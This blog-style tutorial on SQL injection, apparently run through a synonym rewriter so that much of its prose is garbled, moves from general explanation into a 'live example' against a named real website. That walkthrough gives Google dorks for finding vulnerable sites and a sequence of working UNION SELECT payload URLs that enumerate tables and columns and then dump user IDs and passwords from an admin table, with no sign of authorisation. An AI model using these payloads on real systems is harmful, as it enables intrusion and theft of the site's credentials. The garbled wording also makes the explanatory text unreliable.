SQL injection (SQLi) | part 1.

SQL injection (SQLi)

What is an SQL injection attack

SQL Injection attack (or SQLi) adjust SQL query, injection malicious code by utilizing vulnerability.

Effective SQLi attack permit attackers to change data set data, access delicate information, execute administrator assignments on the data set, and recuperate documents from the framework. At times attacker can give orders to the basic information base working framework.

How do SQL injection attacks work?

Most applications permit their clients to include information somehow, and web applications are the same. Vindictive people can manhandle those information entering components in manners that meddle with the generation of SQL query.

The things I call “information entering systems” are how clients input information into the application. More often than not, these future structure fields and URL boundaries. By fiddling with those components perfectly, attacker can inject—consequently the name—extra SQL orders, which get executed.

Few sorts of SQL injection

—the following are a couple of normal variations.

SQL injection based on user input

A fundamental SQL injection attack utilizes client inputs. Web applications acknowledge inputs through structures, which pass a client’s contribution to the information base for handling. If the web application recognizes these contributions without cleaning them, an attacker can inject SQL proclamations through structure fields and erase, duplicate, or adjust the substance of the data set.

SQL injection based on cookies

One more way to deal with SQL injection is changing cookies to “poison” information base questions. Web applications regularly load cookies and utilize their information as a component of data set tasks. A malicious client, or malware conveyed on a client’s device, could adjust cookies to SQL in an unforeseen way into the backend information base.

SQL injection based on HTTP headers

Server factors such as HTTP headers can likewise be utilized for SQL injection. On the off chance that a web application acknowledges inputs from HTTP headers, counterfeit headers containing subjective SQL can code into the data set.

Second-order SQL injection

These are potentially the most intricate SQL injection attacks since they might lie lethargic for an extensive period. A second-order SQL injection attack conveys harmed information, which may be viewed as harmless in one setting; however, it is vindictive in another specific circumstance. Regardless of whether designers disinfect all application inputs, they could, in any case, be defenseless against this kind of attack.

Impact of SQL Injection Attacks

The following are a couple of instances of the damage SQL injection attack can cause of an association, if successful.

Find credentials —

SQL injection can be utilized to discover client qualifications. attacker would then be able to mimic these clients and use their advantages.

Access database —

attacker can utilize SQL injection to access the stored in a data set server.

Explanation of SQL Injection Vulnerability

As the name recommends, a SQL injection Vulnerability authorized an attacker to injection vindictive contribution to a SQL articulation. To completely understand the issue, we initially need to see how server-side prearranged language handles SQL queries.

For instance, suppose usefulness in the web application creates a string with the accompanying SQL explanation:

$statement = “SELECT * FROM users WHERE username = ‘ravi’ AND password = ‘hacksec’";

This SQL articulation is passed to a capacity that sends the string to the associated information base, where it is parsed, executed, and returns an outcome.

As you would have seen, the assertion contains some new, unique characters:

  • *(asterisk) is a guide for the SQL data set to return all sections for the chosen information base column.
  • = (equal ) is guidance for the SQL data set return esteems that match the looked through h string.
  • ' (single statement mark) is utilized to tell the SQL information base where the pursuit string starts or closures

Presently consider the accompanying model where a site client can change the upsides of ‘$user’ and ‘$password, for example, in a login structure:

$statement = “SELECT * FROM users WHERE username = ‘$user’ AND password= ‘$password’";

An attacker can, without much of a stretch, supplement any unique SQL linguistic structure inside the statement if the application doesn’t disinfect the info:

$statement = “SELECT * FROM users WHERE username = ‘admin’; – ' AND password= ‘anything’";= ‘anything’";

What’s going on here? (admin’; –) is the attacker’s feedback, which contains two new, extraordinary characters:

  • ; (semicolon) is utilized for training the SQL parser that the current assertion has finished (excessive much of the time).
    • (twofold dash) teaches the SQL parser that the remainder of the line is a remark and ought not to be executed.

This SQL injection successfully eliminates the secret phrase confirmation and returns a dataset for a current client – ‘admin’ for this situation. The attacker would now be able to sign in with a manager account without determining a secret word.

Database:

The database is an assortment of information. From a site perspective, data set is utilized for putting away client ids, passwords, web page subtleties, and that’s only the tip of the iceberg.

Some List of Database are:

  • DB servers,
  • MySQL(Open source),
  • MSSQL,
  • MS-ACCESS,
  • Oracle,
  • Postgre SQL(open source),
  • SQLite

let’s move to the live example

Stage 1: Finding Vulnerable Website:

Our best accomplice for SQL injection is Google. We can track down the Vulnerable websites(hackable sites) utilizing the Google Dork list. Google dimwit is looking for weak sites using google looking through stunts. There is part of stunts to look in google. In any case, we will utilize “inurl:” order for tracking down the weak sites.

A few Examples:

  • inurl:index.php?id=
  • inurl:gallery.php?id=

Stage 2: Checking the Vulnerability:

Presently we should take a look at the Vulnerability of sites. To look at the fault, add the single statements(') toward the finish of the URL and hit enter. (No space between the number and single statements)

Example:-

fallback http://www.pha.org.pk/sro_list.php?catid=1'

enter image description here

Suppose the page stays on the same page or shows that page not found or shows some different website pages. Then, at that point, it isn’t defenseless.

If it is showing any mistakes which are identified with SQL query, then it is powerless.

Stage 3: Finding Number of columns:

Presently we have discovered the site is powerless. The subsequent stage is to track down the number of columns in the table.

For that, supplant the single statements(') with “request by a” statement. (leave one space among numbers and request by n explanation)

Change from 1,2,3,4, 5,6,… n. Until you get the blunder like “obscure columns. " Example:

fallback http://www.pha.org.pk/sro_list.php?catid=1 order by 1
http://www.pha.org.pk/sro_list.php?catid=1 order by 2
http://www.pha.org.pk/sro_list.php?catid=1 order by 3
http://www.pha.org.pk/sro_list.php?catid=1 order by 4

enter image description here

change the number until you get the mistake as “obscure segment.”

Assuming you get the blunder while attempting the “x"th number, no of the segments is “x-1”.

Ex.

fallback http://www.pha.org.pk/sro_list.php?catid=1 order by 1–(no error)

http://www.pha.org.pk/sro_list.php?catid=1 order by 2–(no error)

http://www.pha.org.pk/sro_list.php?catid=1 order by 3–(no error)

http://www.pha.org.pk/sro_list.php?catid=1 order by 4–(no error)

http://www.pha.org.pk/sro_list.php?catid=1 order by 5–(no error)

http://www.pha.org.pk/sro_list.php?catid=1 order by 6–(error)

so presently x=6 , The quantity of segment is x-1 i.e, 5.

enter image description here

At some point the above may not work. At the time add the “– " toward the finish of the assertion.

Stage 4: Displaying the Vulnerable sections:

Utilizing “association select columns_sequence” we can track down the weak piece of the table. Supplant the “request by n” with this assertion. Furthermore, change the id worth to negative(i mean id=-2, must change, but in some sites might work without evolving).

Supplant the columns_sequence with the no from 1 to x-1(number of sections) isolated with commas(,).

on the off chance that the quantity of segments is 5 ,the query is as follow:-

fallback http://www.pha.org.pk/sro_list.php?catid=-1 +UNION+ALL+SELECT+1,2,3,4,5–+—

It will show a few numbers in the page(it should be not exactly ‘x’ esteem, I mean not exactly or equl to number of sections).

enter image description here

Presently select 1 number. It showing 3,4. How about we take Number 3.

Stage 5: Finding the Table Name

Presently we need to track down the table name of the information base. Supplant the 3 with “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

Ex.

fallback http://www.pha.org.pk/sro_list.php?catid=-1 +UNION+ALL+SELECT+1,2,group_concat(table_name,0x3c6c693e),4,5 from information_schema.tables where table_schema=database()–+-

0x3c6c693e this one use to list

enter image description here

Now select the “cp_user ” table.

Stage 6: Finding the Column Name

Presently supplant the “group_concat(table_name) with the “group_concat(column_name)”

Supplant the “from information_schema.tables where table_schema=database()– " with “FROM information_schema.columns WHERE table_name=mysqlchar–

Presently listen cautiously,we need to discover convert the table name to MySql CHAR() string and supplant mysqlchar with that.

Discover MysqlChar() for Tablename:

Most importantly, introduce the HackBar addon: https://github.com/Xero-Zero/HackBar-Mod-Pro-

select sql->Mysql->MysqlChar()

Reorder the code toward the finish of the url rather than the “mysqlchar”

Ex.

fallback http://www.pha.org.pk/sro_list.php?catid=-1 +UNION+ALL+SELECT+1,2,group_concat(column_name,0x3c6c693e),4,5 from information_schema.columns where table_name=CHAR(99, 112, 95, 117, 115, 101, 114)–+-

### (img 6)

Presently it will show the rundown of sections.

like -

  • u_name
  • u_id
  • u_pass
  • u_type
  • is_active ..

fallback Presently supplant the supplant group_concat(column_name) with group_concat(columnname,0x3c6c693e,another column name).

Column name ought to be supplanted from the recorded segment name.

Another column name ought to be supplanted from the recorded segment name.

fallback Presently supplant the " from information_schema.columns where table_name=CHAR(99, 112, 95, 117, 115, 101, 114)" with the “from table_name”

Ex:

fallback http://www.pha.org.pk/sro_list.php?catid=-1 +UNION+ALL+SELECT+1,2,group_concat(u_id,0x3c6c693e,u_pass),4,5 from cp_user–+-

enter image description here

At some point, it will show the section isn’t found. Then, at that point, attempt another section names Presently it will have a Username and passwords. Appreciate

Thanks for reading